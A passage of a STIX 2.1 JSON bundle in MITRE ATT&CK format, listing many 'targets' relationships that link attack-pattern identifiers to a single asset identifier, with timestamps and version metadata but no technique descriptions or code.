"identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ceec650a-ad43-4b8c-b74d-bb570ae415f6", "created": "2024-07-01T10:37:15.836031", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836033", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--eeebc268-8165-42f3-a719-ee964b26c261", "created": "2024-07-01T10:37:15.836041", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836043", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5cbde290-9d7a-4cf7-a74b-aef1703c15b5", "created": "2024-07-01T10:37:15.836050", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836053", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1f9c2bae-b441-4f66-a8af-b65946ee72f2", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f845f7f5-305e-4237-bbe8-db2dde3e8304", "created": "2024-07-01T10:37:15.836060", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836062", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--208884f1-7b83-4473-ac22-4e1cf6c41471", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bdc7c6f7-998f-49cd-b3c8-77378d3d9218", "created": "2024-07-01T10:37:15.836070", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836072", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--91cc15b7-7e22-4b15-8a95-c2835278eebc", "created": "2024-07-01T10:37:15.836080", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836082", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--215d9700-5881-48b8-8265-6449dbb7195d", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--aafd4f6c-76a1-4ca2-be1a-2872eba307de", "created": "2024-07-01T10:37:15.836089", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836091", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--21875073-b0ee-49e3-9077-1e2a885359af", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3d463567-6336-4cef-a23c-16230a7afa35", "created": "2024-07-01T10:37:15.836099", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836101", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--22522668-ddf6-470b-a027-9d6866679f67", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3aa9fd81-d07c-466e-bdfd-03aebe83a17b", "created": "2024-07-01T10:37:15.836109", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836111", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--34cf67e9-ea8a-451f-a032-2bab4110fe4a", "created": "2024-07-01T10:37:15.836118", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836120", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--232a7e42-cd6e-4902-8fe9-2960f529dd4d", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--aaea2234-2b3e-4a41-a651-57d2f99f8c82", "created": "2024-07-01T10:37:15.836128", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836130", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f8f70445-1a1c-4975-9ddb-df12adc875ad", "created": "2024-07-01T10:37:15.836137", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836140", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--246fd3c7-f5e3-466d-8787-4c13d9e3b61c", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e609e53f-d360-49cf-913f-7b4828684bfa", "created": "2024-07-01T10:37:15.836147", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836149", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--24769ab5-14bd-4f4e-a752-cfb185da53ee", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5e22ce05-471c-4173-a6be-039349ea2f63", "created": "2024-07-01T10:37:15.836157", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836159", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--24bfaeba-cb0d-4525-b3dc-507c77ecec41", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--84eede20-fd2d-4ae7-92b9-e5629eb4707b", "created": "2024-07-01T10:37:15.836166", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836168", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--25659dd6-ea12-45c4-97e6-381e3e4b593e", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a4133625-f12f-4ff9-87c7-25d8e1d8a3f0", "created": "2024-07-01T10:37:15.836176", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836178", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--28170e17-8384-415c-8486-2e6b294cb803", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--aa1f3a39-31bb-4fae-858a-0e0a66a4e832", "created": "2024-07-01T10:37:15.836185", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836188", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bec6be38-ee78-4e7e-9273-f39bf0c9b3d2", "created": "2024-07-01T10:37:15.836195", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836197", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--29ba5a15-3b7b-4732-b817-65ea8f6468e6", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0aeff3a4-39f0-4e2e-95bf-52169f30b272", "created": "2024-07-01T10:37:15.836205", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836207", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--29be378d-262d-4e99-b00d-852d573628e6", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bc33800d-9e57-4eed-9063-1d489f56ebf3", "created": "2024-07-01T10:37:15.836214", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836216", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2aed01ad-3df3-4410-a8cb-11ea4ded587c", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--628393df-1a2a-4067-8430-0ee1a52df6fa", "created": "2024-07-01T10:37:15.836224", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836226", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5967e518-b152-4ea4-b1f7-d7db46aa674b", "created": "2024-07-01T10:37:15.836234", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836236", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a5fd71ce-837f-4f61-8ae5-b93bc6f41060", "created": "2024-07-01T10:37:15.836243", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836245", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c85f7f22-de98-40b6-aedd-4944fb2e5b1c", "created": "2024-07-01T10:37:15.836253", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836255", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2cd950a6-16c4-404a-aa01-044322395107", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9f95d9fd-fced-43ae-b2c4-01c55ad03ee5", "created": "2024-07-01T10:37:15.836263", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836265", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2de47683-f398-448f-b947-9abcc3e32fad", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e330be89-7e3b-4d8d-96e6-89be8831862d", "created": "2024-07-01T10:37:15.836273", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836275", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--488e9376-1a7b-4ca1-8434-4b90576652b3", "created": "2024-07-01T10:37:15.836282", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836284", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2f41939b-54c3-41d6-8f8b-35f1ec18ed97", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e74b0eba-847d-439a-82b9-9ae3292bb726", "created": "2024-07-01T10:37:15.836292", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836294", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2f6b4ed7-fef1-44ba-bcb8-1b4beb610b64", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e938e709-e8af-4ceb-b718-ec19436a5968", "created": "2024-07-01T10:37:15.836301", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836303", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--479f6315-21b3-4c6f-bba9-11127a7e5c27", "created": "2024-07-01T10:37:15.836311", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836313", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e64a1cac-121c-4eab-8dd7-cfe1a3906146", "created": "2024-07-01T10:37:15.836321", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836323", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--30973a08-aed9-4edf-8604-9084ce1b5c4f", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8ba1ab3e-f3e3-4360-b1a4-e0f5d83304e5", "created": "2024-07-01T10:37:15.836330", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836332", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--51e58171-8593-4221-942e-cfd023a0e66a", "created": "2024-07-01T10:37:15.836340", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836342", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--322bad5a-1c49-4d23-ab79-76d641794afa", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--74d25019-1d8f-4671-9d5c-21c2a18f9a27", "created": "2024-07-01T10:37:15.836350", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836352", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3257eb21-f9a7-4430-8de1-d8b6e288f529", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--39161377-f9ff-42f4-92ad-c935fcb53db5", "created": "2024-07-01T10:37:15.836359", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836361", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0cfc56f5-5988-4a60-a1b6-e788fe124ee0", "created": "2024-07-01T10:37:15.836369", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836371", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--26dfa885-4c48-4527-9380-3d47993f8c85", "created": "2024-07-01T10:37:15.836379", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836381", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--341e222a-a6e3-4f6f-b69c-831d792b1580", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e32e49fb-3eb3-40ae-8882-5b29d407acad", "created": "2024-07-01T10:37:15.836388", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836390", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3489cfc5-640f-4bb3-a103-9137b97de79f", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--56de5aa4-8d4b-4cd3-b0bd-f93cda9069fc", "created": "2024-07-01T10:37:15.836398", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836400", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--348f1eef-964b-4eb6-bb53-69b3dcb0c643", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9d26f5dc-47db-4d83-9b57-100baee9de51", "created": "2024-07-01T10:37:15.836408", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836410", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--34e793de-0274-4982-9c1a-246ed1c19dee", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--32be4b1c-1aca-4ffe-a3e5-a6f379832385", "created": "2024-07-01T10:37:15.836417", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.836419", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", 